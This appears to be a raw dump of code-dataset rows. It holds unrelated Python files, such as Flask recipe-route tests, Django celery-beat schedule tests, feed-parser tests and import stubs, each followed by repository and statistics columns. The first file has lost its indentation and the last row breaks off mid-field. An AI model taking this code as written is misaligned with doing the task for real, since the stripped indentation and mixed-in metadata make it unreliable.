# EDIT RECIPE VIEW #
####################
def test_edit_recipe():
# test page link
response = app.test_client().get('/edit_recipe/')
assert response.status_code == 404
# test error checking
response = app.test_client().get('/edit_recipe/gfdsgd/sfdds', follow_redirects=True)
assert response.status_code == 200
#################
# UPDATE RECIPE #
#################
def test_update_recipe():
# test page link
response = app.test_client().get('/update_recipe/')
assert response.status_code == 404
# test error checking
response = app.test_client().get('/update_recipe/gfdsgd/asfas', follow_redirects=True)
assert response.status_code == 404
#######################
# UPDATE RECIPE IMAGE #
#######################
def test_update_recipe_image():
# test page link
response = app.test_client().get('/update_recipe_image/')
assert response.status_code == 404
# test error checking
response = app.test_client().get('/update_recipe_image/gfdsgd/asfas', follow_redirects=True)
assert response.status_code == 404
#################
# DELETE RECIPE #
#################
def test_delete_recipe():
# test page link
response = app.test_client().get('/delete_recipe/')
assert response.status_code == 404
# test redirect
response = app.test_client().get('/delete_recipe/gfdsgd', follow_redirects=True)
assert response.status_code == 200
##################
# ADD INGREDIENT #
##################
def test_add_ingredient_item():
# test page link
response = app.test_client().get('/add_ingredient_item/')
assert response.status_code == 404
# test error
response = app.test_client().get('/add_ingredient_item/gfdsgd/sfsdf', follow_redirects=True)
assert response.status_code == 404
#####################
# DELETE INGREDIENT #
#####################
def test_delete_ingredient_item():
# test page link
response = app.test_client().get('/delete_ingredient_item/')
assert response.status_code == 404
# test error
response = app.test_client().get('/adelete_ingredient_item/gfdsgd/sfsdf', follow_redirects=True)
assert response.status_code == 404
###################
# ADD METHOD ITEM #
###################
def test_add_method_item():
# test page link
response = app.test_client().get('/add_method_item/')
assert response.status_code == 404
# test error
response = app.test_client().get('/add_method_item/gfdsgd/sfsdf', follow_redirects=True)
assert response.status_code == 404
######################
# DELETE METHOD ITEM #
######################
def test_delete_method_item():
# test page link
response = app.test_client().get('/delete_method_item/')
assert response.status_code == 404
# test error
response = app.test_client().get('/delete_method_item/gfdsgd/sfsdf', follow_redirects=True)
assert response.status_code == 404
###############
# RATE RECIPE #
###############
def test_rate_recipe():
# test page link
response = app.test_client().get('/rate_recipe/')
assert response.status_code == 404
# test post
response = app.test_client().post('/rate_recipe/ghfjgf', data={'rating': '1'}, follow_redirects=True)
assert response.status_code == 404
| 28.816901 | 105 | 0.633431 | 481 | 4,092 | 5.149688 | 0.106029 | 0.10214 | 0.139281 | 0.194994 | 0.824384 | 0.802584 | 0.778361 | 0.740412 | 0.677836 | 0.601534 | 0 | 0.024177 | 0.161046 | 4,092 | 141 | 106 | 29.021277 | 0.697349 | 0.131965 | 0 | 0.396552 | 0 | 0 | 0.166022 | 0.115409 | 0 | 0 | 0 | 0 | 0.396552 | 1 | 0.189655 | false | 0 | 0.017241 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1167347bea395f4eedbbde7de5179e9fd7093929 | 116 | py | Python | test_mayavi.py | roughhawkbit/robs-python-scripts | 7d9a28cff106887553970b5c4c37cd53a836c2ff | [
"MIT"
] | null | null | null | test_mayavi.py | roughhawkbit/robs-python-scripts | 7d9a28cff106887553970b5c4c37cd53a836c2ff | [
"MIT"
] | 1 | 2015-02-23T16:31:21.000Z | 2015-02-25T16:34:14.000Z | test_mayavi.py | roughhawkbit/robs-python-scripts | 7d9a28cff106887553970b5c4c37cd53a836c2ff | [
"MIT"
] | null | null | null | #!/usr/bin/python
from __future__ import division
from __future__ import with_statement
import mayavi
import numpy
| 16.571429 | 37 | 0.836207 | 16 | 116 | 5.5 | 0.6875 | 0.227273 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12069 | 116 | 6 | 38 | 19.333333 | 0.862745 | 0.137931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
fedaeaab8052b4c954c46825fa0ee67ba4dbc1a6 | 18 | py | Python | nginpro/__main__.py | thesabbir/nginpro | b3ca2fbadc19fa28798434bb640f4d0a1bf742b9 | [
"MIT"
] | 1 | 2020-12-28T16:33:54.000Z | 2020-12-28T16:33:54.000Z | nginpro/__main__.py | thesabbir/nginpro | b3ca2fbadc19fa28798434bb640f4d0a1bf742b9 | [
"MIT"
] | null | null | null | nginpro/__main__.py | thesabbir/nginpro | b3ca2fbadc19fa28798434bb640f4d0a1bf742b9 | [
"MIT"
] | null | null | null | from ngin import * | 18 | 18 | 0.777778 | 3 | 18 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
feedc77aca85c9824ed89c56afa1ea14b5ca3270 | 95 | py | Python | tests/test_basic.py | RonnyPfannschmidt/dynaconf | 3223f6586aa6ae3ef7b5cd7d198fb950f5038526 | [
"MIT"
] | 2,293 | 2015-08-14T22:39:31.000Z | 2022-03-31T12:44:49.000Z | tests/test_basic.py | RonnyPfannschmidt/dynaconf | 3223f6586aa6ae3ef7b5cd7d198fb950f5038526 | [
"MIT"
] | 676 | 2015-08-20T19:29:56.000Z | 2022-03-31T13:45:51.000Z | tests/test_basic.py | RonnyPfannschmidt/dynaconf | 3223f6586aa6ae3ef7b5cd7d198fb950f5038526 | [
"MIT"
] | 255 | 2015-12-02T21:16:33.000Z | 2022-03-20T22:03:46.000Z | from dynaconf import settings
def test_has_wrapped():
assert settings.configured is True
| 15.833333 | 38 | 0.789474 | 13 | 95 | 5.615385 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168421 | 95 | 5 | 39 | 19 | 0.924051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3a1bf5b7a2d77585574b3425f6b4f4df5f2f5ba6 | 26 | py | Python | section1/lesson2_step2_hello_selenium.py | andreymelostnoy/stepik_selenium_python | fa5912c2f7360616ccb914d821853af6a51fd324 | [
"Apache-2.0"
] | null | null | null | section1/lesson2_step2_hello_selenium.py | andreymelostnoy/stepik_selenium_python | fa5912c2f7360616ccb914d821853af6a51fd324 | [
"Apache-2.0"
] | 1 | 2021-06-02T00:25:52.000Z | 2021-06-02T00:25:52.000Z | section1/lesson2_step2_hello_selenium.py | andreymelostnoy/stepik_selenium_python | fa5912c2f7360616ccb914d821853af6a51fd324 | [
"Apache-2.0"
] | null | null | null | print("Hello, Selenium!")
| 13 | 25 | 0.692308 | 3 | 26 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 26 | 1 | 26 | 26 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
3a2a8614105e4d0fa7c3ae3d8b36571b11507913 | 180 | py | Python | det3d/models/necks/__init__.py | stooloveu/Det3D | ac20e98e88c2b0c99ccbe9e7307608d18e87e885 | [
"Apache-2.0"
] | 5 | 2021-01-10T08:14:11.000Z | 2021-06-19T15:01:15.000Z | det3d/models/necks/__init__.py | stooloveu/Det3D | ac20e98e88c2b0c99ccbe9e7307608d18e87e885 | [
"Apache-2.0"
] | null | null | null | det3d/models/necks/__init__.py | stooloveu/Det3D | ac20e98e88c2b0c99ccbe9e7307608d18e87e885 | [
"Apache-2.0"
] | 4 | 2020-11-24T06:31:14.000Z | 2021-06-19T15:01:26.000Z | from .fpn import FPN, ResNet_FPN, ResNet_Panoptic_FPN
from .rpn import RPN, PointModule
__all__ = ["RPN", "PointModule", "FPN", "ResNet_FPN", "ResNet_FPN", "ResNet_Panoptic_FPN"]
| 36 | 90 | 0.75 | 25 | 180 | 4.96 | 0.32 | 0.362903 | 0.290323 | 0.435484 | 0.467742 | 0.467742 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 180 | 4 | 91 | 45 | 0.775 | 0 | 0 | 0 | 0 | 0 | 0.311111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
3a7b04626a9e049d7b7477d76dfde7bac642e058 | 5,155 | py | Python | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 4 | 2021-02-26T22:50:47.000Z | 2021-06-05T07:59:43.000Z | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 15 | 2021-02-26T22:54:56.000Z | 2022-02-22T18:52:11.000Z | example/tests/test_utils.py | ZipDeal-LLC/django-tenants-celery-beat | 7eea658502289385b64b9dbd25e73d85db563516 | [
"MIT"
] | 2 | 2021-12-07T03:57:32.000Z | 2022-02-25T17:37:06.000Z | from celery.schedules import crontab
from django.test import TestCase
from django_tenants_celery_beat.utils import generate_beat_schedule
from tenancy.models import Tenant
class GenerateBeatScheduleTestCase(TestCase):
@classmethod
def setUpTestData(cls):
Tenant.objects.bulk_create(
[
Tenant(name="Tenant 1", schema_name="tenant1", timezone="Europe/London"),
Tenant(name="Tenant 2", schema_name="tenant2", timezone="US/Eastern"),
]
)
def test_public(self):
expected = {
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(),
"options": {
"headers": {"_schema_name": "public", "_use_tenant_timezone": False}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(),
"tenancy_options": {
"public": True,
"all_tenants": False,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_all_tenants(self):
expected = {
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {"headers": {"_schema_name": "tenant1", "_use_tenant_timezone": False}}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {"headers": {"_schema_name": "tenant2", "_use_tenant_timezone": False}}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"tenancy_options": {
"public": False,
"all_tenants": True,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_public_all_tenants(self):
expected = {
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "public", "_use_tenant_timezone": False
}
}
},
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "tenant1", "_use_tenant_timezone": False
}
}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"options": {
"headers": {
"_schema_name": "tenant2", "_use_tenant_timezone": False
}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(day_of_month=1),
"tenancy_options": {
"public": True,
"all_tenants": True,
"use_tenant_timezone": False,
}
},
}
)
self.assertEqual(beat_schedule, expected)
def test_use_tenant_timezone(self):
expected = {
"tenant1: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"options": {
"headers": {
"_schema_name": "tenant1", "_use_tenant_timezone": True
}
}
},
"tenant2: task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"options": {
"headers": {
"_schema_name": "tenant2", "_use_tenant_timezone": True
}
}
}
}
beat_schedule = generate_beat_schedule(
{
"task_name": {
"task": "core.tasks.test_task",
"schedule": crontab(0, 1),
"tenancy_options": {
"public": False,
"all_tenants": True,
"use_tenant_timezone": True,
}
},
}
)
self.assertEqual(beat_schedule, expected)
| 34.139073 | 98 | 0.423084 | 385 | 5,155 | 5.335065 | 0.137662 | 0.075949 | 0.107595 | 0.093476 | 0.796008 | 0.778968 | 0.760467 | 0.760467 | 0.760467 | 0.708861 | 0 | 0.010507 | 0.464597 | 5,155 | 150 | 99 | 34.366667 | 0.733696 | 0 | 0 | 0.51049 | 1 | 0 | 0.237633 | 0 | 0 | 0 | 0 | 0 | 0.027972 | 1 | 0.034965 | false | 0 | 0.027972 | 0 | 0.06993 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c9222213d3f12bd43d453c55ba0af4e5b3eb3247 | 81 | py | Python | src/daos/exceptions/__init__.py | taonguyen740/flask_based_3tier_framework | f02e492eff0206e661925dddcf0ba978ead38b5e | [
"MIT"
] | null | null | null | src/daos/exceptions/__init__.py | taonguyen740/flask_based_3tier_framework | f02e492eff0206e661925dddcf0ba978ead38b5e | [
"MIT"
] | null | null | null | src/daos/exceptions/__init__.py | taonguyen740/flask_based_3tier_framework | f02e492eff0206e661925dddcf0ba978ead38b5e | [
"MIT"
] | null | null | null | from .dao_exception import DaoException
from .dao_error_code import DaoErrorCode
| 27 | 40 | 0.876543 | 11 | 81 | 6.181818 | 0.727273 | 0.205882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098765 | 81 | 2 | 41 | 40.5 | 0.931507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c92f83b5adbd17272b3872b2b2e3717a8d19c7ea | 41 | py | Python | .history/app/__init___20210927034955.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | .history/app/__init___20210927034955.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | .history/app/__init___20210927034955.py | GraceOswal/pitch-perfect | d781c6e0f55c11f2a5e5dceb952f6b2de3c47c3b | [
"MIT"
] | null | null | null | from flask_sqlalchemy import SQLAlchemy
| 13.666667 | 39 | 0.878049 | 5 | 41 | 7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 41 | 2 | 40 | 20.5 | 0.972222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c94fbeafbaf48387b4f175f545254fecf6b65086 | 41 | py | Python | donkey_gym/envs/__init__.py | araffin/donkey_gym | f49b1d578f9189d97eba221d7c9a2128b97d31a0 | [
"MIT"
] | null | null | null | donkey_gym/envs/__init__.py | araffin/donkey_gym | f49b1d578f9189d97eba221d7c9a2128b97d31a0 | [
"MIT"
] | null | null | null | donkey_gym/envs/__init__.py | araffin/donkey_gym | f49b1d578f9189d97eba221d7c9a2128b97d31a0 | [
"MIT"
] | null | null | null | from donkey_gym.envs.donkey_env import *
| 20.5 | 40 | 0.829268 | 7 | 41 | 4.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.864865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c958e528a13ded6c42166661735235007e9d85d5 | 1,929 | py | Python | tests/test_create_feed_from_url.py | adrian/feed2me | 446d1a3c320a64fb74adfee0736c4fa4a7eb7e0b | [
"MIT"
] | 4 | 2015-12-18T07:27:14.000Z | 2017-09-15T02:18:08.000Z | tests/test_create_feed_from_url.py | adrian/feed2me | 446d1a3c320a64fb74adfee0736c4fa4a7eb7e0b | [
"MIT"
] | null | null | null | tests/test_create_feed_from_url.py | adrian/feed2me | 446d1a3c320a64fb74adfee0736c4fa4a7eb7e0b | [
"MIT"
] | null | null | null | import unittest
import views
import feedparser
class TestCreateFeedFromURL(unittest.TestCase):
def setUp(self):
self.orig_parse_func = feedparser.parse
def test_with_character_encoding_exception(self):
test_feed = feedparser.FeedParserDict()
test_feed['bozo'] = True
test_feed['bozo_exception'] = feedparser.ThingsNobodyCaresAboutButMe()
test_feed['status'] = 200
test_feed['channel'] = feedparser.FeedParserDict()
test_feed['channel']['title'] = "A Test Feed"
test_feed['entries'] = []
feedparser.parse = lambda url: test_feed
feed = views.create_feed_from_url("http://abc.com")
self.assertEquals("A Test Feed", feed.name)
def test_with_temp_redirect(self):
test_feed = feedparser.FeedParserDict()
test_feed['bozo'] = False
test_feed['status'] = 302
test_feed['channel'] = feedparser.FeedParserDict()
test_feed['channel']['title'] = "A Test Feed"
test_feed['entries'] = []
test_feed['href'] = 'http://def.com'
feedparser.parse = lambda url: test_feed
feed = views.create_feed_from_url("http://abc.com")
self.assertEquals("A Test Feed", feed.name)
self.assertEquals('http://abc.com', feed.url)
def test_with_permanent_redirect(self):
test_feed = feedparser.FeedParserDict()
test_feed['bozo'] = False
test_feed['status'] = 301
test_feed['channel'] = feedparser.FeedParserDict()
test_feed['channel']['title'] = "A Test Feed"
test_feed['entries'] = []
test_feed['href'] = 'http://def.com'
feedparser.parse = lambda url: test_feed
feed = views.create_feed_from_url("http://abc.com")
self.assertEquals("A Test Feed", feed.name)
self.assertEquals('http://def.com', feed.url)
def teardown():
feedparser.parse = self.orig_parse_func
| 34.446429 | 78 | 0.640228 | 225 | 1,929 | 5.275556 | 0.204444 | 0.20219 | 0.141533 | 0.161752 | 0.702612 | 0.702612 | 0.702612 | 0.702612 | 0.662174 | 0.662174 | 0 | 0.006032 | 0.226542 | 1,929 | 55 | 79 | 35.072727 | 0.789544 | 0 | 0 | 0.581395 | 0 | 0 | 0.152411 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 1 | 0.116279 | false | 0 | 0.069767 | 0 | 0.209302 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c96bc4b63c9521207dd79bcee2abe73c969345dd | 381 | py | Python | metrics/plugins/__init__.py | matthewj8489/Starcraft2Metrics | 5156434bc22d25cc005c83e22ac4b3423ee40355 | [
"MIT"
] | 4 | 2019-10-06T01:16:36.000Z | 2020-12-23T21:01:55.000Z | metrics/plugins/__init__.py | matthewj8489/Starcraft2Metrics | 5156434bc22d25cc005c83e22ac4b3423ee40355 | [
"MIT"
] | 3 | 2019-03-09T17:26:43.000Z | 2020-04-12T18:19:35.000Z | metrics/plugins/__init__.py | matthewj8489/Starcraft2Metrics | 5156434bc22d25cc005c83e22ac4b3423ee40355 | [
"MIT"
] | null | null | null | from metrics.plugins.time_conversion import TimeConverter
from metrics.plugins.supply import SupplyTracker
from metrics.plugins.bases_created import BasesCreatedTracker
#from metrics.plugins.supply_created import SupplyCreatedTracker
from metrics.plugins.resources import ResourceTracker
from metrics.plugins.apm import APMTracker
from metrics.plugins.spm import SPMTracker
| 47.625 | 65 | 0.868766 | 45 | 381 | 7.288889 | 0.422222 | 0.234756 | 0.384146 | 0.146341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091864 | 381 | 7 | 66 | 54.428571 | 0.947977 | 0.165354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c97702212ddef73f3bd773aefe6b0438bb8f0858 | 190 | py | Python | pricelist/admin.py | WillieIlus/jobscorner | ed3734468ea0e88a306a1d29bc876562e940f4fb | [
"bzip2-1.0.6"
] | 2 | 2020-04-12T13:18:35.000Z | 2021-04-02T04:18:17.000Z | pricelist/admin.py | WillieIlus/jobscorner | ed3734468ea0e88a306a1d29bc876562e940f4fb | [
"bzip2-1.0.6"
] | 3 | 2020-02-11T23:58:53.000Z | 2020-09-06T18:46:17.000Z | pricelist/admin.py | WillieIlus/jobscorner | ed3734468ea0e88a306a1d29bc876562e940f4fb | [
"bzip2-1.0.6"
] | 1 | 2020-08-17T08:29:41.000Z | 2020-08-17T08:29:41.000Z | from django.contrib import admin
from .models import Type, Item, Service, Price
admin.site.register(Type)
admin.site.register(Item)
admin.site.register(Service)
admin.site.register(Price)
| 21.111111 | 46 | 0.8 | 28 | 190 | 5.428571 | 0.428571 | 0.236842 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089474 | 190 | 8 | 47 | 23.75 | 0.878613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
a38199d7834cb53203fdde94622082befbfa53c0 | 68 | py | Python | visigoth/common/event_handler/__init__.py | visigoths/visigoth | c5297148209d630f6668f0e5ba3039a8856d8320 | [
"MIT"
] | null | null | null | visigoth/common/event_handler/__init__.py | visigoths/visigoth | c5297148209d630f6668f0e5ba3039a8856d8320 | [
"MIT"
] | 1 | 2021-01-26T16:55:48.000Z | 2021-09-03T15:29:14.000Z | visigoth/common/event_handler/__init__.py | visigoths/visigoth | c5297148209d630f6668f0e5ba3039a8856d8320 | [
"MIT"
] | null | null | null | from visigoth.common.event_handler.event_handler import EventHandler | 68 | 68 | 0.911765 | 9 | 68 | 6.666667 | 0.777778 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044118 | 68 | 1 | 68 | 68 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6e662e2c475277827607f32c1f1d39aba3ac3072 | 202 | py | Python | observations/tests.py | dbca-wa/penguins | 9e107d071cd38d9d05a673a52061753cae458d83 | [
"Apache-2.0"
] | null | null | null | observations/tests.py | dbca-wa/penguins | 9e107d071cd38d9d05a673a52061753cae458d83 | [
"Apache-2.0"
] | 8 | 2021-03-31T20:09:47.000Z | 2022-03-29T22:03:38.000Z | observations/tests.py | dbca-wa/penguins | 9e107d071cd38d9d05a673a52061753cae458d83 | [
"Apache-2.0"
] | 3 | 2019-01-14T04:53:40.000Z | 2019-01-22T01:46:31.000Z | from django.test import TestCase
class CivilTwilightTests(TestCase):
def test_civil_twilight_different_days(self):
pass
def test_civil_twilight_different_locations(self):
pass
| 22.444444 | 54 | 0.762376 | 24 | 202 | 6.083333 | 0.625 | 0.09589 | 0.164384 | 0.273973 | 0.39726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.188119 | 202 | 8 | 55 | 25.25 | 0.890244 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0.166667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
6e8c2fdcd513e6bc8d97f0b5be5c6775769b9873 | 45 | py | Python | tempodb/protocol/__init__.py | tempodb/tempodb-python | 8ce45231bd728c6c97ef799cf0f1513ea3a9a7d3 | [
"MIT"
] | 4 | 2015-02-04T14:05:37.000Z | 2018-03-01T09:46:34.000Z | tempodb/protocol/__init__.py | tempodb/tempodb-python | 8ce45231bd728c6c97ef799cf0f1513ea3a9a7d3 | [
"MIT"
] | 2 | 2022-01-30T22:45:34.000Z | 2022-01-30T22:45:42.000Z | tempodb/protocol/__init__.py | tempodb/tempodb-python | 8ce45231bd728c6c97ef799cf0f1513ea3a9a7d3 | [
"MIT"
] | 1 | 2018-04-16T13:55:50.000Z | 2018-04-16T13:55:50.000Z | from protocol import *
from objects import *
| 15 | 22 | 0.777778 | 6 | 45 | 5.833333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 23 | 22.5 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6e8cf6cb5e4a6de1abe96074b57f87cd28ea59cc | 49 | py | Python | python/testData/inspections/PyUnresolvedReferencesInspection/ReturnedQualifiedReferenceUnionType/b.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/inspections/PyUnresolvedReferencesInspection/ReturnedQualifiedReferenceUnionType/b.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
